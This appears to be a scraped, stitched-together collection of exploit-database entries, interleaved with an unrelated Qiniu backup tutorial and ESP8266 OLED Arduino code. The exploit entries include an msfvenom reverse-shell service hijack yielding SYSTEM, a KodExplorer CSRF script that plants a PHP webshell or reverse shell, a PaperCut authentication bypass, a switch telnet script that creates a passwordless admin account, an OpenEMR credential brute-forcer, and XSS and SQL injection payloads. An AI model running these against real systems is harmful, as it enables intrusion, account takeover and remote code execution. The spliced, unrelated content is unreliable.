LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OCS Inventory Service
DEPENDENCIES : RpcSs
: EventLog
: Winmgmt
: Tcpip
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe
[4] Upload the revese shell to C:\Program Files (x86)\OCS.exe
> put OCS.exe
> ls
drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .
drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 ..
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files
-rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer
drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET
drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent
-rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe
drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT
drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop "OCS Inventory Service"
> sc start "OCS Inventory Service"
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
# Date: 21/04/2023
# Exploit Author: MrEmpy
# Software Link: https://github.com/kalcaddle/KodExplorer
# Version: <= 4.49
# Tested on: Linux
# CVE ID: CVE-2022-4944
# References:
# * https://vuldb.com/?id.227000
# * https://www.cve.org/CVERecord?id=CVE-2022-4944
# * https://github.com/MrEmpy/CVE-2022-4944
import argparse
import http.server
import socketserver
import os
import threading
import requests
from time import sleep
def banner():
print('''
_ _____________ _____ _ ______ _____
_____
| | / / _ | _ \ ___| | | | ___ \/ __ \|
___|
| |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/|
|__
| \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | |
__|
| |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\|
|___
\_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_|
\____/\____/
| |
|_|
[KODExplorer <= v4.49 Remote Code Executon]
[Coded by MrEmpy]
''')
def httpd():
port = 8080
httpddir = os.path.join(os.path.dirname(__file__), 'http')
os.chdir(httpddir)
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(('', port), Handler)
print('[+] HTTP Server started')
httpd.serve_forever()
def webshell(url, lhost):
payload = '<pre><?php system($_GET["cmd"])?></pre>'
path = '/data/User/admin/home/'
targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
wshell_f = open('http/shell.php', 'w')
wshell_f.write(payload)
wshell_f.close()
print('[*] Opening HTTPd port')
th = threading.Thread(target=httpd)
th.start()
print(f'[+] Send this URI to your target:
{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
{lhost}:8080/shell.php&uuid=&time=')
print(f'[+] After the victim opens the URI, his shell will be hosted at
{url}/data/User/admin/home/shell.php?cmd=whoami')
def reverseshell(url, lhost):
rvpayload = '
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
'
path = '/data/User/admin/home/'
targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
lport = input('[*] Your local port: ')
reqpayload = requests.get(rvpayload).text
reqpayload = reqpayload.replace('127.0.0.1', lhost)
reqpayload = reqpayload.replace('1234', lport)
wshell_f = open('http/shell.php', 'w')
wshell_f.write(reqpayload)
wshell_f.close()
print('[*] Opening HTTPd port')
th = threading.Thread(target=httpd)
th.start()
print(f'[+] Send this URI to your target:
{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
{lhost}:8080/shell.php&uuid=&time=')
input(f'[*] Run the command "nc -lnvp {lport}" to receive the
connection and press any key\n')
while True:
hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')
sleep(1)
if not hitshell.status_code == 200:
continue
else:
print('[+] Shell sent and executed!')
break
def main(url, lhost, mode):
banner()
if mode == 'webshell':
webshell(url, lhost)
elif mode == 'reverse':
reverseshell(url, lhost)
else:
print('[-] There is no such mode. Use webshell or reverse')
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url', action='store', help='target url',
dest='url', required=True)
parser.add_argument('-lh','--local-host', action='store', help='local
host', dest='lhost', required=True)
parser.add_argument('-m','--mode', action='store', help='mode
(webshell, reverse)', dest='mode', required=True)
arguments = parser.parse_args()
main(arguments.url, arguments.lhost, arguments.mode)
# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
# Date: 21 April 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350
import requests
from bs4 import BeautifulSoup
import re
def vuln_version():
ip = input("Enter the ip address: ")
url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted"
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
text_div = soup.find('div', class_='text')
product_span = text_div.find('span', class_='product')
# Search for the first span element containing a version number
version_span = None
for span in text_div.find_all('span'):
version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
if version_match:
version_span = span
break
if version_span is None:
print('Not Vulnerable')
else:
version_str = version_span.text.strip()
print('Version:', version_str)
print("Vulnerable version")
print(f"Step 1 visit this url first in your browser: {url}")
print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")
if __name__ =="__main__":
vuln_version()
I have previously mentioned how to automatically backup FTP and databases on Linux VPS daily, but you need to build your own FTP space, which is a bit troublesome than this tutorial. If you don’t have FTP space, you can apply for a Qiniu Cloud Storage. Free 10G space backup is enough for ordinary small sites. Here is a script to backup website files and databases to Qiniu. The actual test results are pretty good. You can automatically backup them every day by setting up a scheduled task under Linux vps. The Github project address of this script: https://github.com/ccbikai/backuptoqiniu
First register a Qiniu Cloud account, and then after real-name authentication, you will get 10G of traffic and space. After registering, find the object storage at the left position, then create a new storage space, and remember the name of the newly created storage space, which you need to use later.
Method
Note: The system python version must be above 2.7
1. Install zip
apt-get install zip Note: the centos command is
yum install zip
2. Install the backup script
wget --no-check-certificate -O backuptoqiniu.zip https://www.moerats.com/usr/down/backuptoqiniu.zip
unzip backuptoqiniu.zip cd backuptoqiniu
python setup.py install
3. Edit configuration file
Use vi backuptoqiniu.sh command or Winscp tool to edit
##Backup Configuration Information ##
#Backup name, used to mark
BACKUP_NAME='backup'
#Backup directory, please separate multiple spaces
BACKUP_SRC='/home/wwwroot/moerats.com'
#Mysql host address
MYSQL_SERVER='localhost'
#Mysql username
MYSQL_USER='root'
#Mysql Password
MYSQL_PASS='mysqlpassword'
#Mysql backup database, please separate multiple spaces
MYSQL_DBS='dbname'
#Replace the file temporarily in the directory, generally no changes are required
BACKUP_DIR='/tmp/backuptoqiniu'
#Back up file compression password to ensure the security of the compressed package
BACKUP_FILE_PASSWD='123456'
##Backup Configuration Information End ##
##Qi Niu Configuration Information ##
#Storage space corresponds to the folder we created on Qiniu
QINIU_BUCKET='Rats'
QINIU_ACCESS_KEY='ACCESS_KEY'
QINIU_SECRET_KEY='SECRET_KEY'
##Qi Niu Configuration Information End ##The script configuration above has basically been written very clearly. The first half of the website is filled in, and the last three lines of information are obtained in Qi Niu. QINIU_BUCKET is the storage space name, ACCESS_KEY and SECRET_KEY are obtained in the personal panel-key management. The long list of AK and SK that corresponds to is the key.
4. Test script
chmod +x backuptoqiniu.sh
After ./backuptoqiniu.sh is running normally, we can go to the Qiniu background to check if there is any compressed package in the newly created storage space.
5. Set up automatic running scripts
crontab -e
0 2 * * 0 /bin//root/backuptoqiniu/backuptoqiniu.sh #Add this script The above script means to use crontab timed tasks to automatically run this script at 2 a.m. every day. For specific usage of crontab, please refer to the file. Detailed explanation of the commands for the installation of Crontab of Linux system and timing tasks
Note: Many times our VPS needs to use the timing function when running scripts or restarting certain software. At this time, we need to use the Crontab timing software.
Note: If you are using foreign vps, you may also need to set it to domestic time by CP /usr/share/zoneinfo/Asia/Shanghai /etc/localtime.
Then service cron restart starts your scheduled task.
The effect is as follows
You can view the backup files in Qiniu Cloud 
# Exploit Title: FS-S3900-24T4S Privilege Escalation
# Date: 29/04/2023
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350
import sys
import telnetlib
def exploit(args):
print(args)
if len(args) != 1:
print(f"Usage: {sys.argv[0]} <ip>")
sys.exit(1)
else:
ip = args[0]
try:
with telnetlib.Telnet(ip, 23) as tn:
try:
tn.read_until(b"Username: ")
tn.write(b"guest\r\n")
tn.read_until(b"Password: ")
tn.write(b"guest\r\n")
tn.read_until(b">")
tn.write(b"enable\r\n")
tn.read_until(b"Password: ")
tn.write(b"super\r\n")
tn.read_until(b"#")
tn.write(b"configure terminal\r\n")
tn.read_until(b"(config)#")
tn.write(b"username admin nopassword\r\n")
tn.read_until(b"(config)#")
print(
"Exploit success, you can now login with username: admin and password: <empty>")
tn.close()
except KeyboardInterrupt:
print("Exploit failed")
tn.close()
except ConnectionRefusedError:
print("Connection refused")
if __name__ == "__main__":
exploit(sys.argv[1:])
# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force
# Date: 2023-04-28
# Exploit Author: abhhi (Abhishek Birdawade)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz
# Version: 7.0.1
# Tested on: Windows
'''
Example Usage:
- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt
'''
import requests
import sys
import argparse, textwrap
from pwn import *
#Expected Arguments
parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))
parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)")
parser.add_argument("-u","--username", help="Username to Bruteforce for.")
parser.add_argument("-ul","--userlist", help="Username Dictionary")
parser.add_argument("-p","--passlist", help="Password Dictionary")
args = parser.parse_args()
if len(sys.argv) < 2:
print (f"Exploit Usage: python3 exploitBF.py -h")
sys.exit(1)
# Variable
LoginPage = args.url
Username = args.username
Username_list = args.userlist
Password_list = args.passlist
log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')
def login(Username,Password):
session = requests.session()
r = session.get(LoginPage)
# Progress Check
process = log.progress('Brute Force')
#Specifying Headers Value
headerscontent = {
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Referer' : f"{LoginPage}",
'Origin' : f"{LoginPage}",
}
#POST REQ data
postreqcontent = {
'new_login_session_management' : 1,
'languageChoice' : 1,
'authUser' : f"{Username}",
'clearPass' : f"{Password}"
}
#Sending POST REQ
r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)
#Printing Username:Password
process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))
#Conditional loops
if 'Location' in r.headers:
if "/interface/main/tabs/main.php" in r.headers['Location']:
print()
log.info(f'SUCCESS !!')
log.success(f"Use Credential -> {Username}:{Password}")
sys.exit(0)
#Reading User.txt & Pass.txt files
if Username_list:
userfile = open(Username_list).readlines()
for Username in userfile:
Username = Username.strip()
passfile = open(Password_list).readlines()
for Password in passfile:
Password = Password.strip()
login(Username,Password)
# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux
### Steps to Reproduce ###
- Please login from this address:
https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin
- Click on the "Add Section" button.
- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the
"Section" box and save it.
- Boom! An alert message saying "Stored" will appear in front of you.
### PoC Request ###
POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
HTTP/1.1
Host: localhost
Cookie: pj_sid=PJ1.0.6199026527.1682777172;
pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1;
PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1;
pjd=7l9bb4ubmknrdbns46j7g5cqn7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Origin: https://localhost
Referer:
https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T
Equipment List
esp8266 development board oled (0.96) DuPont Line
Equipment circuit diagram
Add library
u8g2 library file
Project 1 Hello World
/*
HelloWorld.ino
esp8266+oled project example
Forum: bbskali.cn
Blog: blog.bbskali.cn
*/
#include Arduino.h
#include U8g2lib.h
#ifdef U8X8_HAVE_HW_SPI
#include SPI.h
#endif
#ifdef U8X8_HAVE_HW_I2C
#include Wire.h
#endif
U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //Here D1 D2 is the corresponding welding pin
void setup(void) {
u8g2.begin();
}
void loop(void) {
u8g2.clearBuffer(); //clear the internal memory
u8g2.setFont(u8g2_font_ncenB08_tr); //choose a suitable font
u8g2.drawStr(0,10,'Hello World!'); //write something to the internal memory
u8g2.sendBuffer(); //transfer internal memory to the display
delay(1000);
}The effect is as follows
The code of
Item 2 Display Chinese characters
is as follows:
/*
esp8266+oled display
Show Chinese character items
Forum address: bbskali.cn
Blog: blog.bbskali.cn
*/
#include Arduino.h
#include U8g2lib.h
#ifdef U8X8_HAVE_HW_SPI
#include SPI.h
#endif
#ifdef U8X8_HAVE_HW_I2C
#include Wire.h
#endif
U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //All Boards without Reset of the Display
void setup(void) {
u8g2.begin();
u8g2.enableUTF8Print(); //enable UTF8 support for the Arduino print() function
}
void loop(void) {
u8g2.setFont(u8g2_font_unifont_t_chinese2); //use chinese2 for all the glyphs of 'Hello world'
u8g2.setFontDirection(0);
u8g2.clearBuffer();
u8g2.setCursor(0, 15);
u8g2.print('kali forum');
u8g2.setCursor(0, 30);
u8g2.print('bbskali.cn'); //Chinese 'Hello World'
u8g2.setCursor(0, 45);
u8g2.print('kali Hacker Teaching');
u8g2.sendBuffer();
delay(1000);
}The effects are as follows:
The code of
Item 3 Display multiple lines of text
is as follows:
/*
*/
#include Arduino.h
#include U8g2lib.h
#ifdef U8X8_HAVE_HW_SPI
#include SPI.h
#endif
#ifdef U8X8_HAVE_HW_I2C
#include Wire.h
#endif
U8G2_SSD1306_128X64_NONAME_1_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //All Boards without Reset of the Display
#define FONT u8g2_font_wqy14_t_gb2312b
//#define FONT u8g2_font_wqy16_t_chinese1
//#define FONT u8g2_font_wqy16_t_gb2312b
//The next two macros define the scroll speed of the short story
#define SCROLL_DELTA 2
#define SCROLL_DELAY 200
const char c_str[]=
'Shen Nong\n\n'
'KALI Forum Introduction\n'
'kali forum was created at 20\n'
'17, Webmaster Priess\n'
'This forum is based on kali'
'Full Research and Cybersecurity\n'
'For the convenience of friends' learning\n'
'We built this forum\n'
'Forum study is completely free\n'
'Our URL :\n'
'bbskali,cn\n'
'WeChat official account:\n'
'【kali Hacker Teaching】\n'
'Thank you for your attention. \n';
char buf[48]; //there are at most 8 chinese glyphs per line, max buf size is 8*3=24
uint8_t total_lines; //the total number of lines in the story
uint8_t i; //loop variable for the lines
uint8_t line_cnt; //number of lines to draw, usually equal to lines_per_draw
uint8_t start_line; //topmost visible line, derived from top_window_pos
uint8_t lines_per_draw; //how many lines to draw on the screen, derived from font and display height
uint16_t glyph_height; //height of the glyphs
uint16_t top_window_pos; //defines the display position in pixel within the text
uint16_t total_height; //total height in pixel, derived from font height and total_lines
u8g2_uint_t top_offset; //offset between the first visible line and the display
void setup(void) {
/* U8g2 Project: SSD1306 Test Board */
pinMode(D2, OUTPUT);
pinMode(D1, OUTPUT);
digitalWrite(10, 0);
digitalWrite(9, 0);
/* U8g2 Project: T6963 Test Board */
//pinMode(18, OUTPUT);
//digitalWrite(18, 1);
/* U8g2 Project: KS0108 Test Board */
//pinMode(16, OUTPUT);
//digitalWrite(16, 0);
/* U8g2 Project: LC7981 Test Board, connect RW to GND */
//pinMode(17, OUTPUT);
//digitalWrite(17, 0);
/* U8g2 Project: Pax Instruments Shield: Enable Backlight */
//pinMode(6, OUTPUT);
//digitalWrite(6, 0);
u8g2.begin();
/* select a font */
//u8g2.setFont(u8g2_font_wqy12_t_chinese1); //two unknown glyphs
//u8g2.setFont(u8g2_font_wqy12_t_chinese3); //two unknown glyphs
//u8g2.setFont(u8g2_font_wqy12_t_gb2312a); //';' is missing
//u8g2.setFont(u8g2_font_wqy12_t_gb2312b); //all glyphs available
u8g2.setFont(FONT);
/* calculate the length of the text in lines */
total_lines=u8x8_GetStringLineCnt(c_str);
/* get the height of the glyphs */
glyph_height=u8g2.getMaxCharHeight();
/* calculate the height of the text in pixel */
total_height=(uint16_t)total_lines * (uint16_t)glyph_height;
/* calculate how many lines must be drawn on the screen */
lines_per_draw=u8g2.getDisplayHeight()/glyph_height;
lines_per_draw +=2;
/* start at the top of the text */
top_window_pos=0;
}
void loop(void) {
start_line=top_window_pos/glyph_height;
top_offset=top_window_pos %glyph_height;
line_cnt=total_lines - start_line;
if ( line_cnt lines_per_draw )
line_cnt=lines_per_draw;
u8g2.firstPage();
do {
for( i=0; i line_cnt; i++ )
{
/* copy a line of the text to the local buffer */
u8x8_CopyStringLine(buf, i+start_line, c_str);
/* draw the content of the local buffer */
u8g2.drawUTF8(0, i*glyph_height-top_offset +glyph_height, buf);
}
} while ( u8g2.nextPage() );
delay(SCROLL_DELAY);
top_window_pos +=SCROLL_DELTA;
} 
# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux
### Request ###
GET
/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
HTTP/1.1
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/simplecms/preview.php?lid=1
Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;
_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;
pjd_simplecms=1; last_position=%2F
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
### Parameter & Payloads ###
Parameter: column (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)
THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)
END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: action=pjActionGetFile&column=2 AND
EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT
(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10